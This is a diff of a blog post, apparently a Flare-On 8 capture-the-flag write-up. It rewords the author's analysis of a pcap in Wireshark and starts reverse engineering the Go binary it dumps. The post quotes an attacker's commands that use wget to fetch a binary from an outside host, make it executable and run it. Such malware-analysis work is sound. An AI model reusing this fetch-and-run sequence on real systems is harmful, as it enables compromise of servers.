acquykhud/acquykhud.github.io/collections/_posts/2021-09-01-Flare-on-8-challenge-10.md

 Honestly, I padded my resume a bunch to get this job and don't even know what a pcap file does.
 Maybe you can figure out what's going on.
 ```
-## First part: Lazy method
+## First solution: Lazy method
-> If you have solved this challenge and just want to understand how the VM works, just go [here](#second-part-understand-the-vm)
+> If you solved this challenge and just want to understand how the VM works, just go [here](#second-solution-understand-the-vm)

-In this challenge, we got only one pcap file: "wizardcult.pcap".
-Open it in Wireshark, we can see that the pcap contains a lot of TCP packets from 172.16.30.249 and 172.16.30.245.
-I will use "Follow TCP stream" function provided by Wireshark to see entire conversations.
+In this challenge, we were given a pcap file named "wizardcult.pcap".
+Let's open it in Wireshark.
+We could notice that the pcap contains a lot of TCP packets between 172.16.30.249 and 172.16.30.245.
+Here I used "Follow TCP stream" feature provided by Wireshark to view the entire conversation.

-The first stream:
+The first stream
 <p align="center">
     <img src="/assets/images/flareon/2021/10/1.png"/>
 </p>
-Look like the server has been compromised and the attacker can run arbitrary command on the server.
+seems like the server has been compromised, and the attacker successfully executed a command on the server.

-The second stream:
+In the second stream:
 <p align="center">
     <img src="/assets/images/flareon/2021/10/2.png"/>
 </p>
-Attacker use wget to download something to the server.
-The command after being urldecoded is `wget -O /mages_tower/induct http://wizardcult.flare-on.com/induct`.
+The attacker used wget to download something to the server.
+The command after being URL decoded is `wget -O /mages_tower/induct http://wizardcult.flare-on.com/induct`.

-The third stream: we can see the file that being downloaded.
-It might be an executable since we can see the "ELF" in the stream.
+As we could see in the third stream, the file was being downloaded.
+I guessed it was an executable file since I detected the string "ELF" in this stream.
 <p align="center">
     <img src="/assets/images/flareon/2021/10/3.png"/>
 </p>

-The fourth and fifth streams: attacker ran `chmod +x /mages_tower/induct` and `/mages_tower/induct`, the other streams: I don't know what happened, but I can see some IRC command, maybe that is the traffic of the newly created process `induct`.
-Now we have to dump the binary from the pcap and reverse engineer it to see what is going on.
+Continue to the fourth and the fifth streams: the attacker ran these two commands `chmod +x /mages_tower/induct` and `/mages_tower/induct`.

+I was not sure what happened in the rest.
+However, I could see some IRC commands which may be the traffic of the newly created process - `induct`.
+To figure out what's going on, we needed to dump the binary from the pcap and reverse engineer it.

 ```
 ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, not stripped
 ```
-The file is a 64-bit executable.
-After opened it in IDA Pro, I know it is a Golang executable since it has a function named "main_main".
-This function is also the entrypoint.
+It was a 64-bit executable file.
+I analyzed the file in IDA Pro and found out it was a Golang executable as I discovered the function named "main_main".
+This function was also the entry point.
-> In this post, I will not go to deep into Golang internal, since it will make this post too long.
-Instead, you can read it [here](https://dr-knz.net/go-calling-convention-x86-64.html).
+> In this post, I won't get into Golang internals since it would be too lengthy.
+You may follow this [link](https://dr-knz.net/go-calling-convention-x86-64.html) to read more.

 ```cpp
 void __cdecl main_main()